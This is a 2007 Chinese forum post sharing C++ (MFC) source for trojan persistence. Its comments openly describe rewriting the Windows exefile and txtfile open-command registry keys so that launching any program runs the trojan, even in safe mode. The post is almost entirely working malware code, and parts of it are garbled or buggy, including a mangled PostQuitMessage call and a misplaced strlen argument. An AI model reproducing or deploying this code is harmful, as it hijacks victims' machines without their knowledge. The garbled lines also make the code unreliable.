|
|
存在问题:与所有的exe都关联
BOOL CFileSearch::RelativeRar()
{
BOOL result = FALSE;
CString str;
str.Format("%s",AfxGetApp()->m_lpCmdLine);//取得传入的命令行参数
const char *MutexObject="MyStart";//建立互斥对象
HANDLE hMutex = NULL;
hMutex = ::CreateMutex(false,false,MutexObject);
if(hMutex != NULL)
{
DWORD err = GetLastError();
if(err == ERROR_ALREADY_EXISTS)
: ostQuitMessage(0);//如果发现同一程序已经运行,则退出
}
if(str.Find("txt") != -1)
{
CString temp;
char ch;
int length = str.GetLength();
for(long i = 0; i < length; i ++)
{
ch = str.GetAt(i);
if(ch == '\\')
temp = temp + "\\\\";
else
temp = temp + ch;
}
temp = temp.Left(temp.GetLength() - 2);
temp = temp.Mid(1); //上面的函数是把字符串中的"\"变为"\\"
char str1[]="\"%1\" %*";
// 在执行原有程序之前必须把注册表恢复,否则用ShellExecute还是执行我们的木马程序。
ShellExecute(NULL,"open","notepad.exe",temp,NULL,SW_SHOW);//执行原有的程序
}
/*
//在程序执行完成后,再把注册表改为我们要启动的木马程序的
TCHAR str2[256];
// 得到程序全路径名
GetModuleFileName( NULL, str2, 255 );
strcat(str2," \"%1\" %*");
::RegSetValue(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command", REG_SZ,(LPCTSTR)str2 , strlen(str2) + 1);
//经过上述过程只要程序一运行就会执行我们的start 程序了。
char str3[]="NOTEPAD.EXE %1";
::RegSetValue(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command", REG_SZ,(LPCTSTR)str3 , strlen(str3 + 1));
char str1[]="\"%1\" %*";
::RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",
REG_SZ,(LPCTSTR)str1 , strlen(str1) + 1);*/
//char str[]="\"%1\" %*";
str = "g3zuSaNUIsEmailCode.txt";
RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",REG_SZ,(LPCTSTR)str,strlen(str)+1);
// 在执行原有程序之前必须把注册表恢复,否则用ShellExecute还是执行我们的木马程序。
ShellExecute(NULL,"open","notepad.exe",NULL,NULL,SW_SHOW);//执行原有的程序
//在程序执行完成后,再把注册表改为我们要启动的木马程序的
TCHAR filename[256];
// 得到程序全路径名
GetModuleFileName( NULL, filename, 255 );
strcat(filename," \"%1\" %*");
RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",REG_SZ,(LPCTSTR)filename , strlen(filename) + 1);
//经过上述过程只要程序一运行就会执行我们的start 程序了。即使是在安全模式下只要执行可执行程序就会运行我们的程序了。
return result;
} |
|
IP卡
狗仔卡
发表于 2007-4-8 19:57:31
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡